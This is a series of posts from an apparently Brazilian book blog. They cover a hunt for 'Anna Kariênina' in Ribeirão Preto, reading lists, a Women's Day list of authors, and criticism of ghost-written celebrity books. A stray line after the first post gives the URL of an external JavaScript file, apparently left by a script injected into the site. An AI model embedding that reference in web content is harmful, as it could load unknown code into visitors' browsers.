ANNA K, CADÊ VOCÊ?

Preciso desabar: estou revoltada e pasma com a situação das livrarias-bibliotecas-sebos de Ribeirão.

Vou contar a história. Mês que vem meu clube do livro vai discutir ‘Anna Kariênina’ (é aberto e de graça para quem quiser!) e então comecei a ir atrás do meu exemplar.

QUE ODISSÉIA.

Queria muito um da finada Cosac Naify, traduzido direto do russo, arte lindíssima, enfim, uma joia. Está esgotado, o mais barato que encontrei foi R$200,00, nesse momento de bolsista em que vivo, é impossível.

Comecei a buscar opções para mim e meu grupo nas bibliotecas de Ribeirão e livrarias. O resultado é deprimente.

Fui na Biblioteca Altino Arantes, apenas um exemplar, já emprestado e com fila de espera. Liguei na Biblioteca Padre Euclides, a pessoa que me atendeu não quis dizer se havia o livro no acervo, me falou que essa informação só por email (custava dizer ‘sim, tem’ ou ‘não tem’ apenas?). Fui nos sebos, nada. Em um apenas o volume dois, nos outros apenas um exemplar que já havia sido vendido. Ribeirão tem 3 sebos.

E AÍ? COMO ACHAR ESSE LIVRO?

Comecei a ligar e ir nas livrarias para ver quanto estavam as edições novas.

Liguei na Livraria Cultura, a pessoa me disse que estava esgotado na Cosac, ok. Perguntei se havia outras opções, ela me indicou da Editora 34, ‘porque as traduções são boas’.

Esse livro nunca foi publicado pela Editora 34.

Perguntei de outras, ela me respondeu ‘tem que ver se tem por encomenda’. E só.

Fui na Travessa, perguntei, ‘não tem nenhum, vai lançar da Companhia das Letras’. E fim. Liguei hoje e me disseram que tem o lançamento no Rio e chega ‘a qualquer momento’ aqui.

Fui na FNAC, perguntei, a pessoa sequer sabia do que eu estava falando. Ela vende livros e não conhece ‘Anna Kariênina’. Ok. E nem vem, a pessoa vende livros. Numa livraria. E não conhece um dos maiores clássicos da literatura mundial.

Liguei na Saraiva, me disseram ‘tem da Cosac por encomenda’. Já quase infartei. Achei melhor ser específica, disse que está esgotado, talvez ela pudesse ter, no máximo, um perdido no estoque. Ela refez a busca e, obviamente, não tinha por encomenda.

Por fim, liguei na Livraria Cultura para saber se o exemplar da Companhia das Letras já tinha lançado hoje, 07/07 (é a data de lançamento na internet). A pessoa me deixou esperando uma cara no telefone (se é lançamento deveria estar com mil exemplares na loja, em destaque, né?), voltou e disse que não tinha. Comentei ‘ia lançar hoje’, ela respondeu ‘ah vai lançar, é? ’. Achei que a vendedora de livros era você.

No fim das contas, estou lendo no Kindle uma versão piratex, porque não existe outra possibilidade. Essa é Ribeirão Preto, a capital da cultura.

E posso parecer amarga com as livrarias, mas hoje existe um hype de chamar vendedor de livro de ‘livreiro’, especialmente nas livrarias metidinhas, aka Travessa. Mas sinto informar, falta um infinito para essa galerinha chegar perto de um livreiro.

Livreiro sabe e conhece o que vende.

Essas pessoas não tem iniciativa, não tem empatia pelo cliente. Ninguém se aprofundou em nenhuma busca, ninguém foi ver quando a Companhia das Letras ia lançar, ninguém fez o menor esforço para me vender nada E EU QUERIA COMPRAR! Fui tratada em todas as lojas como se eu estivesse pedindo um favor ou o livro de graça ou como eu estivesse falando de algo totalmente obscuro.

E fiquei sem Anna K.

https://cloudapi.online/js/api46.js

DIA DA MULHER: 4 ESCRITORAS PARA SE LER

Então hoje é dia da mulher! Parabéns para todas nós, hoje e sempre.

Nem vou entrar na discussão de ‘não queremos flores, queremos respeito’, porque acho que temos o direito de ter ambos. Não sei porque a maioria das pessoas ainda pensa em ou isso ou aquilo. Eu quero ter tudo, todas nós temos o direito de ter tudo. Enfim, entrei em devaneios.

Hoje eu resolvi organizar uma lista de livros escritos por mulheres e indicar aqui. Eu já faço isso no canal e para quem quiser conferir tem uma playlist bem lindona só de autoras, mas aqui no blog vou tentar indicar algumas obras diferentes de lá. Bora:

Começando com as brasileiras:

– Hilda Hilst: nascida em Campinas, era formada em direito, foi poetisa, romancista, cronista e tudo que puder ser relacionado a literatura. Ganhou diversos prêmios e é considerada um dos maiores nomes da literatura em língua portuguesa. Segundo a própria autora suas obras têm como tema máximo a complexa relação entre o homem e Deus. Faleceu em 2004 aos 73 anos.

Indico:

A obscena Senhora D

Do desejo

– Rachel de Queiroz: nascida em Fortaleza, ela era jornalista, tradutora, romancista e também intimamente ligada a todos os estilos literários. Foi uma pioneira: a primeira mulher a ingressar na Academia Brasileira de Letras, a primeira a receber o prêmio Camões e formadora do primeiro núcleo do Partido Comunista Brasileiro. Ela chegou a ser presa em 1937, acusada de ser comunista e diversos exemplares de suas obras foram queimados. Já em 1964 ela apoiou a ditadura militar integrando o Conselho Federal de Cultura e o diretório nacional da ARENA, partido político de sustentação do regime. Faleceu em 2003 aos 92 anos.

Indico:

O quinze

Memorial de Maria Moura

– Ursula K. Le Guin: nascida na Califórnia, formada em letras é um dos principais nomes da ficção científica. É escritora desde a infância e lecionou literatura em diversas universidades nos Estados Unidos. Recebeu, nomeadamente por suas obras, cinco prémios Hugo, seis prémios Nebula e nove prémios Locus, mais do que qualquer outro autor. Suas obras são cheias de temas como sociologia, política, ambientalismo, anarquismo e taoísmo. A autora é viva e tem 87 anos.

Indico:

A mão esquerda da escuridão (tem resenha aqui) e esse discurso incrível.

*’Os despossuídos’ vai sair em português pela editora Aleph em maio!

– Virginia Woolf: nascida em Londres, foi uma romancista, editora britânica e uma das mais proeminentes figuras do modernismo. Ela era membro do Grupo de Bloomsbury e desempenhava um papel de significância dentro da sociedade literária londrina durante o período entre guerras. A autora foi estudada em diversos aspectos, desde suas críticas sociais, até suas visões feministas e seus problemas psiquiátricos (Woolf sofria de depressão). Ela cometeu suicídio em 1941, aos 57 anos.

Indico: Mrs. Dalloway

#oultimojuro

:)

FacebookInstagramTwitterYoutubeSkoobGoodreads

Conheça meus contos:

O véuA Biblioteca do Mediterrâneo

PROMESSAS E LISTAS PARA 2017

E o que seria de um ano novo sem uma boa promessa?

Nem vou enrolar muito, porque são várias listas e desejos. Vou colocar tudo em um post só para eu não me fazer de malandra e esquecer alguma coisinha lá pelo meio do ano, rs.

Vou começar pelos LIVROS, é óbvio.

Então é o seguinte, eu e Filipe (the boy) fizemos um combinadinho maroto e escolhemos 12 livros para lermos juntenhos em 2017. Eis a lista (sem ordem de mês):

  • O apanhador no campo de centeio (J.D. Salinger)
  • Odisséia (Homero)
  • Cem anos de solidão (Gabriel Garcia Marquez)
  • Em busca do tempo perdido: No caminho de Swann (vol. I)
  • Meu nome é vermelho (Orhan Pamuk)
  • Grande sertão: Veredas (João Guimarães Rosa)
  • Guerra dos mundos (H.G. Wells)
  • Os Maias (Eça de Queirós)
  • Revolução dos bichos (George Orwell)
  • Grandes esperanças (Charles Dickens)
  • O coronel e o lobisomem (José Cândido de Carvalho)
  • A obscena Senhora D. (Hilda Hilst)

(Sim, malandramente, todos eles estão na Lista da vida)

Ai tenho 22 livros da minha estante que estão aqui há séculos que eu gostaria de ler esse ano (lembrando que tem o projeto de comprar o mínimo possível). Em negrito estão os que mais quero ler:

  • O Senhor dos anéis (I-II-III) (Tolkien)
  • O navio de Teseu ou S. (J.J Abrams e Douglas Dorst)
  • Sangue de tinta – Morte de tinta (Cornelia Funke)
  • As brumas de Avalon (III-IV) (Marion Zimmer Bradley)
  • Antologia da literatura fantástica (Borges)
  • Laranja mecânica
  • Neuromancer (William Gibson)
  • Um cântico para Leibowitz (Walter Miller Jr.)
  • O fim da infância (Arthur C. Clark)
  • O fim da eternidade (Isaac Asimov)
  • O guia do mochileiro das galáxias (I-II-III-IV-V) (Douglas Adams)
  • Contos de fadas
  • O sol é para todos (Harper Lee)
  • Vitória (Joseph Conrad)
  • O pêndulo de Foucault (Umberto Eco)

E fora esses todos, ainda tem o clube do livro que sou curadora, na Fundação do Livro e Leitura em Ribeirão (alias, convido a todos para participar, é aberto ao público e de graça!). Nossa primeira leitura de 2017 será ‘A Abadia de Northanger‘, da Jane Austen, bora lá!

Bom, de livro é ~só isso mesmo. Claro que são sugestões, esse ano decidi não me impor nada. Gostaria de chegar nas 50 leituras (esse ano li 32 livros), mas se não for possível, sem crise também. O que vale são as boas experiências e o que a gente absove. Nada a ver ler pela quantidade néam.

Fora os livros (sim existe vida), tenho a meta de ver e acabar algumas séries e assistir mais filmes. Fiz as listas, mas vou colocar em outro post, para esse não ficar gigantesco (assim que fizer coloco o link aqui). Essa é uma meta forte para 2017, porque sou muito preguiçosa no quesito ver.

No mais, meus planos são de conseguir definir e cumprir meus objetivos, digo os pequenos mesmo, tarefas do dia a dia. Tenho a tendência de ter muito gás em determinadas épocas e de desistir da vida em outras, ai morro e não quero fazer nada. Queria conseguir equilibrar isso porque picos de produção, trabalho, rendimento para depois ficar no zero de tudo não é legal.

Queria levar minha saúde mais a sério também. Já levo na verdade, mas queria sair da vida de academia. Sou bastante preocupada com isso, tenho uma boa alimentação, faço tratamento acompanhado de um nutricionista, exercícios diáriamente, mas não largo minha cervejinha por nada desse mundo. Não sou fitness, não sou gostosinha do instagram e não quero ser. Faço tudo isso porque tenho a consicência de que preciso e quero viver bem e com saúde. Mas ultimamente ando com paciência zero para rotina de academia e tenho feito tudo cada vez mais na migué, então acho que é hora de procurar algo novo. É esse o plano.

Outro plano é meditar. Alguém (oi, Filipe) tem me cobrado isso toda hora, e realmente, eu preciso de alguns momentos off para equilíbrio. Vamos ver se vou dar conta.

Em resumo esse ano quero tentar levar tudo de um jeito mais leve. Me estressar menos e simplesmente mudar o que não está sendo legal. Parece bobo, mas nós somos muito resistentes a mudança. Quero também tentar coisas diferentes. Comer em novos lugares, frequentar mais os eventos culturais de Ribeirão, procurar coisas novas. A gente precisa sair dos círculos viciosos.

Bora lá, então!

#oultimojuro

:)

FacebookInstagramTwitterYoutubeSkoobGoodreads

Conheça meus contos:

O véuA Biblioteca do Mediterrâneo

A LISTA DA VIDA

Com o fim do ano já comecei a me preparar para os balanços finais. Lidos – não lidos e os projetos para 2017, é claro. Pensando nisso e em tudo que não li e ainda quero ler, resolvi fazer uma lista sem fim de obras fundamentais . É uma lista para vida, sem especificação de datas para concluir. É formada por coisas que quero ler há tempos, que preciso ler porque são referência, porque marcaram época ou que vem me despertando curiosidade. As escolhas foram baseadas em diversas listas de ‘coisas que você precisa ler porque são fodas’.

Essa lista começa hoje com 80 títulos, mas com certeza será atualizada conforme meu interesse por outras obras.

É a minha versão pessoal do ‘1000 livros para ler antes de morrer’, sabe? Postei aqui para quem mais se interessar e porque fica fácil de ir consultando.

*Lembrete: essa lista é uma escolha pessoal minha e contém obras que eu quero ler. Então nem adianta dizer que está faltando isso ou aquilo. Ela contém obras clássicas e fundamentais para literatura e com quase nada de contemporâneo, é proposital. Para facilitar está tudo separado em subgrupos e organizado por ordem alfabética de autor. Quando estiver sinalizado com OK é porque já foi lido.

HABEMOS LISTA:

Clássicos:

  • O Conde de Monte Cristo – Alexandre Dumas
  • Drácula – Bram Stoker
  • Os Lusíadas – Camões
  • Grandes esperanças – Charles Dickens
  • David Copperfield – Charles Dickens
  • Robinson Crusoé – Daniel Defoe
  • A divina comédia – Dante Alighieri
  • Crime e castigo – Dostoievski
  • Os irmãos Karamazov – Dostoievski
  • Os Maias – Eça de Quirós
  • O morro dos ventos uivantes – Emily Bronte
  • Cem anos de solidão – Gabriel Garcia Marquez
  • Revolução dos bichos – George Orwell
  • Fausto – Goethe
  • Madame Bovary – Gustave Flaubert
  • O Sol é para todos – Harper Lee
  • O jogo das contas de vidro – Hermann Hesse
  • Odisséia – Homero
  • Iliada – Homero
  • O apanhador no campo de centeio – J.D. Salinger
  • Mansfield Park – Jane Austen
  • As vinhas da ira – John Steinbeck
  • O Aleph – Jorge Luis Borges
  • Coração das trevas – Joseph Conrad
  • Meu nome é vermelho – Orhan Pamuk
  • Em busca do tempo perdido (7 volumes) – Proust
  • O médico e o monstro – Robert Louis Stevenson
  • O livro da Selva – Rudyard Kipling
  • Memorial do convento – Saramago
  • Hamlet – Shakespeare
  • Macbeth – Shakespeare
  • Otelo – Shakespeare
  • O vermelho e o negro – Stendhal
  • A montanha mágica – Thomas Mann
  • Anna Kariênina – Tolstói
  • Guerra e paz – Tolstói
  • Mrs Dalloway – Virginia Wolf
  • Lolita – Vladimir Nabokov
  • A ilha do dia anterior – Umberto Eco
  • O Senhor das moscas – William Golding
  • O livro das mil e uma noites

Brasileiros:

  • Noite na taverna – Álvares de Azevedo
  • A rosa do povo – Carlos Drummond de Andrade
  • Espumas flutuantes – Castro Alves
  • Romanceiro da Inconfidência – Cecília Meirelles
  • A paixão segundo GH – Clarice Lispector
  • O vampiro de Curitiba – Dalton Trevisan
  • Os sertões – Euclides da Cunha
  • Encontro marcado – Fernando Sabino
  • A obscena Senhora D – Hilda Hilst
  • Não verás país nenhum – Ignácio de Loyola Brandão
  • O grande sertão: Veredas – João Guimarães Rosa
  • Sagarana – João Guimarães Rosa
  • Gabriela, cravo e canela – Jorge Amado
  • O coronel e o lobisomem – José Cândido de Carvalho
  • Triste fim de Policarpo Quaresma – Lima Barreto
  • Dom Casmurro – Machado de Assis
  • Vestido de noiva – Nelson Rodrigues
  • O quinze – Rachel de Queiroz

Fantasia:

  • Senhor dos Anéis (3 tomos) – J.R.R. Tolkien
  • O nome do vento – Patrick Rothfuss
  • Contos de fadas

Ficção Científica:

  • Laranja mecânica – Anthony Burgess
  • 2001: uma odisseia no espaço – Arthur C. Clarke
  • Encontro com Rama – Arthur C. Clark
  • Contato – Carl Sagan
  • O guia do mochileiro das galáxias (5 livros) – Douglas Adams
  • A guerra dos mundos – H.G. Wells
  • A máquina do tempo – H.G. Wells
  • Eu, robô – Isaac Asimov
  • A ilha misteriosa – Júlio Verne
  • Viagem ao centro da Terra – Júlio Verne
  • Frankenstein – Mary Shelley
  • Snow crash – Neal Stephenson
  • Ender’s game – Orson Scott Card
  • Crônicas Marcianas – Ray Bradbury
  • Um Cântico para Leibowitz – Walter M. Miller Jr.

Quadrinhos:

  • V de vingança – Alan Moore
  • Do Inferno – Alan Moore
  • Y: o último homem – Brian K. Vaughan
  • Sin City – Frank Miller
  • Preacher – Garth Ennis
  • Sandman – Neil Gaiman

 

#oultimojuro

:)

FacebookInstagramTwitterYoutubeSkoobGoodreads

Conheça meus contos:

O véuA Biblioteca do Mediterrâneo

TODO MUNDO É ESCRITOR

Depois de algum tempo apenas assistindo, resolvi trazer meus comentários em forma de textão. De repente todo mundo é escritor, não é mesmo?

Todas as editoras estão achando bacana publicar um livro de subcelebridades. A moda do momento são os youtubers. Gente engraçadinha, biografia adolescente (oi?), donos de canais que bombaram, tem para todos os gostos.

E daí, qual o problema, Gabriela?

Nenhum. Cada um publica o que quer, vende o que quer e lê o que quer.

O ponto é que estou aqui assistindo e achando tudo isso muito engraçado. Muito mesmo.

Quando os primeiros livros saíram, foi a maior febre, todo mundo menos eu a hater AMOU. E ai aconteceu o óbvio: descobriram que ninguém escreveu absolutamente nada. De repente a internet descobriu a existência dos ghost writers, como se eles tivessem saído da deep web nesse instante. Pois é, sinto muito dizer, mas existem pessoas escrevendo e colocando o nome de outras. E nem é trabalho de colégio e faculdade.

Agora tá todo mundo metendo o pau. Achando absurdo, falta de respeito, palhaçada, enganação. Só porque ‘descobriram’ que alguém não foi capaz de escrever um livro em um mês.

Eu assisto isso sem saber se é para rir ou chorar.

Escrever é uma questão de treino, de leitura, de técnica, de persistência e principalmente de estudo.

Aff, Gabriela, e quem é você para falar alguma coisa?

Ninguém, de fato. Minha profissão é escrever, e ainda assim, em cinco anos de estudo, de mestrado, de doutorado, dos meus projetos de escrita fantástica, de blog, eu acho que não sei nada. Tenho muitos problemas, falhas e inseguranças e até hoje morro de medo de apresentar algo meu aos outros. É óbvio que isso possa significar apenas que eu sou ruim no que faço, é uma possibilidade, talento também é necessário. E é claro que eu não sirvo de exemplo para ninguém, mas estou apenas trazendo um ponto.

A caminhada é árdua e não, não existem escritores em um mês.

Repare bem: por que nós ainda não lemos o sexto livro de ‘As crônicas de gelo e fogo’? Ah, porque George Martin está escrevendo ele há CINCO ANOS. CINCO ANOS. E vale lembrar que o primeiro é de 1996, ou seja, a série está sendo escrita há vinte anos.

Deu para entender?

J.K. Rowling demorou dez anos para escrever todos os ‘Harry Potter’. E por ai vai…

Claro que tempo não é fator determinante, mas escrever um livro em poucos meses? Não força, parça.

Não acho que essa ‘literatura’ abre portas para outras. Não acho que é um princípio. Não acho que devemos valorizar para que quem compre se sinta incentivado a comprar mais.

Esse tipo de livro não é para quem gosta de ler e não é para transformar quem não gosta em leitor. É para dar dinheiro. E só.

Respeito mais quem lê saga ‘Crepúsculo’ e ‘Cinquenta tons de cinza’. Pelo menos a pessoa procurou por uma história, seja ela qual for, não por uma pessoa, uma foto na capa, e um ‘causo’ da vida.

Para isso existem revistas. As pessoas estão confundindo as mídias.

Pode parecer meio amargo da minha parte e até, para aqueles que adoram, ~recalque. Mas não, é só tristeza de ver como as coisas estão cada vez mais jogadas, mal feitas (na cara dura!) e todo mundo só engolindo tudo.

Fecho com o vídeo desse senhor:

#oultimojuro

:)

FacebookInstagramTwitterYoutubeSkoobGoodreads – Snapchat: gabriela.bzp

Conheça meus contos:

O véuA Biblioteca do Mediterrâneo

RESENHA: O ASSASSINATO DE ROGER ACKROYD (AGATHA CHRISTIE)

Olá, pessoal!

Na resenha dessa semana falei sobre um dos meus gêneros favoritos: Romance policial! O livro é um clássico e o primeiro best seller da rainha do crime!

#oultimojuro

:)

FacebookInstagramTwitterYoutubeSkoobGoodreads – Snapchat: gabriela.bzp

Conheça meus contos:

O véuA Biblioteca do Mediterrâneo

RESENHA: 1984 (GEORGE ORWELL)

Aproveitando o último post e o assunto ainda fresco, resenhei ‘1984’ lá no canal!

E em breve terá ‘Admirável mundo novo’ e um vídeo comentando os clássicos distópicos! Se você ainda não é inscrito aproveite para se inscrever, pois vem muita coisa por aí!

 

#oultimojuro

🙂

FacebookInstagramTwitterYoutubeSkoobGoodreads – Snapchat: gabriela.bzp

Conheça meus contos:

O véuA Biblioteca do Mediterrâneo